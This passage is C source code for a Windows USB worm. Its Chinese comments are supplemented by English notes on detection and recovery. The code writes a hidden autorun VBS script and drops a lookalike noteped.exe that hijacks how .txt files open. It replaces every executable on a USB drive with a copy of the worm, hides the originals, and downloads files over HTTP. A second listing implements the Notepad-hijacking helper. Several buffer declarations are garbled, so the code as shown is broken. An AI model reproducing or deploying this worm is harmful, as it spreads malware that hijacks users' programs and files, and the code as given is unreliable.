    SetFileAttributes(infname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
    return TRUE;
}
//写入vbs文件,打开磁盘时候运行病毒的同时打开磁盘
bool WriteVbs(char *vbsname)
{
    // Writes system.vbs: a WScript.Shell script that first runs
    // "cmd /c explorer <path>" so the drive still opens as the user expects,
    // then runs "exp1orer.exe" (presumably the hidden copy at the drive root,
    // resolved relative to the script -- not verifiable from this code), and
    // exits. The <path> inserted between vbs1 and vbs2 is derived from
    // vbsname. The file is marked hidden+system.
    // Defender notes: "On Error Resume Next" followed by WScript.Shell.Run of
    // an .exe is a high-signal pattern for script scanning, and wscript.exe
    // spawning cmd.exe/explorer from a drive root is the process-tree
    // indicator.
    // @param vbsname full path of the script to write.
    // @return FALSE if the file cannot be opened, TRUE otherwise.
    char *vbs1={"On Error Resume Next\nDim Wsh\nSet Wsh = WScript.CreateObject(\"WScript.Shell\")\nWsh.Run \"cmd /c explorer "};
    char *vbs2={"\",false,false\nWsh.Run \"exp1orer.exe\",false,false\nWScript.quit"};
    char vbs;
    char path;
    memset(path,0,MAX_PATH);
    memset(vbs,0,MAX_PATH);
    strcpy(path,vbsname);
    path='\0';
    // Assemble prefix + path + suffix into the script text.
    strcpy(vbs,vbs1);
    strcat(vbs,path);
    strcat(vbs,vbs2);
    FILE *fp;
    fp=fopen(vbsname,"w+");
    if(fp==NULL)
        return FALSE;
    fwrite(vbs,sizeof(char),lstrlen(vbs),fp);
    fclose(fp);
    SetFileAttributes(vbsname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
    return TRUE;
}
//向windows目录释放noteped.exe文件,劫持txt文件的打开方式
void ReleaseNoteped()
{
    // Writes the embedded PE image node[] to <windows>\noteped.exe with the
    // hidden+system attributes. That binary is what RegWrite() registers as
    // the txtfile open command: it opens the document with the real
    // notepad.exe and then launches exp1orer.exe (second listing on this page).
    // Defender notes: "noteped.exe" (transposed letters) in the Windows
    // directory next to the genuine notepad.exe is the lookalike to flag, and
    // since the dropped content is a constant blob its file hash is a stable
    // indicator. CreateFile's return value is not checked before WriteFile.
    DWORD written;
    char windows;
    memset(windows,0,MAX_PATH);
    GetWindowsDirectory(windows,MAX_PATH);
    strcat(windows,"\\noteped.exe");
    HANDLE hFile=CreateFile(windows,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
    WriteFile(hFile,node,sizeof(node),&written,NULL);
    FlushFileBuffers(hFile);
    CloseHandle(hFile);
}
//感染U盘,把U盘里可执行文件替换为病毒文件,把原文件名后面加上空格并隐藏,这里需要掌握的是磁盘的遍历方法。。。
bool InfectU(char *UDiskName)
{
    // Executable-replacement routine for removable media. Walks UDiskName
    // with FindFirstFile/FindNextFile, recursing into entries whose
    // attributes equal exactly FILE_ATTRIBUTE_DIRECTORY (the test is ==,
    // not &, so a directory carrying any additional attribute is skipped).
    // Every name containing ".exe" but not " .exe", other than exp1orer.exe,
    // is renamed to "<name> .exe" (a space before the extension) and marked
    // hidden+system, and a copy of this binary is written under the original
    // name with normal attributes. The ".exe" test is a substring match, so a
    // constructed name like "setup.exe.bak" would also be treated as an
    // executable.
    // Defender / recovery notes: on an affected stick every visible X.exe is
    // the worm and the hidden+system "X .exe" beside it is the original;
    // recovery is deleting the former and renaming the latter back.
    // @param UDiskName directory path ending in a backslash (names are
    //        appended with strcat).
    // @return false on the first failed rename or copy, true when the walk
    //         completes. The search handle is never closed with FindClose.
    WIN32_FIND_DATA winfind;
    HANDLE hFile;
    char path;
    char newpath;
    char newname;
    char oldname;
    char filename;
    strcpy(path,UDiskName);
    strcat(path,"*.*");
    hFile=FindFirstFile(path,&winfind);
    if(hFile==INVALID_HANDLE_VALUE)
        return false;
    do
    {
        if(strcmp(winfind.cFileName,".")==0||strcmp(winfind.cFileName,"..")==0)
            continue;
        if(winfind.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY)
        {
            // Recurse into the subdirectory with a trailing backslash.
            sprintf(newpath,"%s%s\\",UDiskName,winfind.cFileName);
            InfectU(newpath);
        }
        if(strstr(winfind.cFileName,".exe")!=NULL && strstr(winfind.cFileName," .exe")==NULL)
        {
            if(strcmp(winfind.cFileName,"exp1orer.exe")!=0)
            {
                // filename = name up to the first ".exe".
                left(filename,winfind.cFileName,int(strstr(winfind.cFileName,".exe")-winfind.cFileName));
                strcpy(newname,UDiskName);
                strcat(newname,filename);
                strcat(newname," .exe");
                strcpy(oldname,UDiskName);
                strcat(oldname,winfind.cFileName);
                // Original moved aside and hidden; worm copy takes its name.
                if(!MoveFileEx(oldname,newname,MOVEFILE_COPY_ALLOWED))
                    return false;
                SetFileAttributes(newname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
                if(!CopyFile(localfile,oldname,FALSE))
                    return false;
                SetFileAttributes(oldname,FILE_ATTRIBUTE_NORMAL);
            }
        }
    }while(FindNextFile(hFile,&winfind));
    return true;
}
//感染磁盘,写入autorun.inf和vbs脚本
void InfectDisk(char *drive)
{
    // Plants the three root-level artifacts on one drive: a hidden+system
    // copy of this binary named exp1orer.exe, autorun.inf (WriteInf) and
    // system.vbs (WriteVbs). CopyFile uses bFailIfExists=TRUE, so an existing
    // exp1orer.exe is kept. The two printf calls are leftover debugging; the
    // binary is linked with /subsystem:windows and has no console, so their
    // output is not visible in normal use.
    // @param drive drive root such as "E:\" with its trailing backslash,
    //        since the file names are appended with strcat.
    char diskfile;
    char diskinf;
    char diskvbs;
    memset(diskfile,0,MAX_PATH);
    memset(diskinf,0,MAX_PATH);
    memset(diskvbs,0,MAX_PATH);
    strcpy(diskfile,drive);
    strcpy(diskinf,drive);
    strcpy(diskvbs,drive);
    strcat(diskfile,"exp1orer.exe");
    strcat(diskinf,"autorun.inf");
    strcat(diskvbs,"system.vbs");
    printf("%s",localfile);
    printf("%s",diskfile);
    CopyFile(localfile,diskfile,TRUE);
    SetFileAttributes(diskfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
    WriteInf(diskinf);
    WriteVbs(diskvbs);
}
//取字符串左边N位
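// Copy at most the first n characters of src into dst and NUL-terminate it.
// Used by InfectU() to strip the ".exe" suffix from a file name.
//
// @param dst destination buffer; must hold min(n, strlen(src)) + 1 bytes.
// @param src NUL-terminated source string.
// @param n   number of characters to copy. Values above strlen(src) are
//            clamped to the whole string; n < 0 copies nothing (the original
//            while(n--) loop kept running for negative n).
// @return dst.
char *left(char *dst,char *src, int n)
{
    size_t len = strlen(src);
    // Clamp the sign first so a negative n never turns into a huge size_t.
    size_t count = n < 0 ? 0 : (size_t)n;
    if (count > len)
        count = len;
    // memmove tolerates overlapping dst/src, which a plain memcpy would not.
    memmove(dst, src, count);
    dst[count] = '\0';
    return dst;
}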
//判断文件是否存在
bool FileExists(char *filename)
{
    // Reports whether FindFirstFile can match filename. Used as the guard
    // for the second-stage download in WinMain() and the noteped.exe drop in
    // Infect().
    // Notes: a successful search handle is never released with FindClose,
    // so every true result leaks one handle; and because filename goes
    // straight to FindFirstFile, wildcard characters in it act as a pattern
    // rather than a literal name.
    // @param filename path (or pattern) to look up.
    // @return true if at least one entry matches, false otherwise.
    HANDLE hFind;
    WIN32_FIND_DATA FindData;
    hFind=FindFirstFile(filename,&FindData);
    if(hFind==INVALID_HANDLE_VALUE)
    {
        return false;
    }
    return true;
}
//利用wininet.h头文件里的与Http有关的API函数实现网络文件的下载(说白了就是从网上读取一段文件然后写入到本地机器)功能
BOOL DownLoadFile(char *url,char *filename)
{
    // Fetches url with WinINet (direct connection, binary transfer,
    // Pragma: no-cache) and writes the response to filename, which is
    // created with CREATE_ALWAYS. Each iteration reads into buffer and then
    // writes sizeof(buffer) bytes -- not byteread -- to the file; the loop
    // ends on the first zero-length read. Returns FALSE on any handle
    // failure, closing whatever was opened so far. InternetReadFile's return
    // value is stored but never examined.
    // Defender notes: plain HTTP with no integrity check on the downloaded
    // file; a GUI process issuing a GET to the hard-coded host in WinMain()
    // followed by a hidden executable appearing under c:\Program Files is
    // the download-and-execute pattern to alert on.
    // @param url      HTTP URL to fetch.
    // @param filename local path to write.
    // @return TRUE on completion, FALSE if any handle could not be opened or
    //         a write failed.
    DWORD byteread=0;
    char buffer;
    memset(buffer,0,25*1024);
    HINTERNET HInternet;
    HInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    if (HInternet==NULL)
    {
        return FALSE;
    }
    HINTERNET HOpen;
    HOpen = InternetOpenUrl(HInternet,url,
        NULL,0,INTERNET_FLAG_TRANSFER_BINARY|INTERNET_FLAG_PRAGMA_NOCACHE,0);
    if (HOpen==NULL)
    {
        InternetCloseHandle(HInternet);
        return FALSE;
    }
    BOOL hwrite;
    DWORD written;
    HANDLE createfile;
    createfile = CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
    if (createfile==INVALID_HANDLE_VALUE)
    {
        InternetCloseHandle(HOpen);
        InternetCloseHandle(HInternet);
        return FALSE;
    }
    BOOL internetreadfile;
    // Read/write loop; terminates only when a read returns zero bytes.
    while(1)
    {
        internetreadfile=InternetReadFile(HOpen,buffer,sizeof(buffer),&byteread);
        if(byteread==0)
            break;
        hwrite=WriteFile(createfile,buffer,sizeof(buffer),&written,NULL);
        if (hwrite==0)
        {
            CloseHandle(createfile);
            InternetCloseHandle(HOpen);
            InternetCloseHandle(HInternet);
            return FALSE;
        }
    }
    CloseHandle(createfile);
    InternetCloseHandle(HOpen);
    InternetCloseHandle(HInternet);
    return TRUE;
}
Notepad.exe文件代码如下:
#pragma comment(lib,"Shell32.lib")
#pragma comment(lib,"kernel32.lib")
#include <windows.h>
#include <tchar.h>
bool FileExists(char *filename);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpszCmdLine,int nCmdShow)
{
    // Entry point of the dropped noteped.exe helper. RegWrite() in the first
    // listing registers it as the txtfile open command
    // ("<windows>\noteped.exe %1"); it rebuilds a command line for the real
    // notepad.exe from its own arguments and shows it, then silently runs
    // exp1orer.exe from the first location that exists: the Windows
    // directory, the System directory, or the relative path built from root.
    // Defender notes: notepad.exe started by a process named noteped.exe in
    // the Windows directory, followed by a hidden exp1orer.exe launch, is the
    // process-tree indicator for the .txt association hijack.
    int argc=0;
    int i;
    LPWSTR *argv=CommandLineToArgvW(GetCommandLineW(),&argc);
    char cmdline;
    char windows;
    char system;
    char root;
    char arg;
    memset(root,'\0',MAX_PATH);
    memset(windows,'\0',MAX_PATH);
    memset(system,'\0',MAX_PATH);
    memset(cmdline,'\0',MAX_PATH);
    memset(arg,'\0',MAX_PATH);
    GetWindowsDirectory(windows,MAX_PATH);
    GetSystemDirectory(system,MAX_PATH);
    lstrcpy(root,windows);
    lstrcpy(cmdline,windows);
    lstrcat(cmdline,"\\notepad.exe");
    lstrcat(windows,"\\exp1orer.exe");
    lstrcat(system,"\\exp1orer.exe");
    // The loop below matters: when the document path arrives as an argument
    // via LPWSTR *argv=CommandLineToArgvW(GetCommandLineW(),&argc), a path
    // containing spaces such as C:\program files\a.txt is split on the spaces
    // (argument count is determined by spaces) and notepad reports that
    // C:\program.txt cannot be found, so the pieces are re-joined with spaces.
    for(i=1;i<argc;i++)
    {
        lstrcat(cmdline," ");
        WideCharToMultiByte(CP_OEMCP,NULL,argv,-1,arg,MAX_PATH,NULL,NULL);
        lstrcat(cmdline,arg);
    }
    // Open the document with the genuine notepad.exe so the user sees
    // normal behaviour.
    WinExec(cmdline,SW_SHOW);
    // Then relaunch the dropper hidden from whichever copy still exists.
    if(FileExists(windows))
        WinExec(windows,SW_HIDE);
    else
        if(FileExists(system))
            WinExec(system,SW_HIDE);
        else
        {
            root='\0';
            lstrcat(root,"exp1orer.exe");
            if(FileExists(root))
                WinExec(root,SW_HIDE);
        }
    return 0;
}
bool FileExists(char *filename)
{
    // Same FindFirstFile-based existence test as in the first listing; used
    // to pick which exp1orer.exe copy to launch.
    // Note: the search handle is never released with FindClose, and wildcard
    // characters in filename are interpreted as a pattern.
    // @param filename path (or pattern) to look up.
    // @return true if at least one entry matches, false otherwise.
    HANDLE hFind;
    WIN32_FIND_DATA FindData;
    hFind=FindFirstFile(filename,&FindData);
    if(hFind==INVALID_HANDLE_VALUE)
    {
        return false;
    }
    return true;
}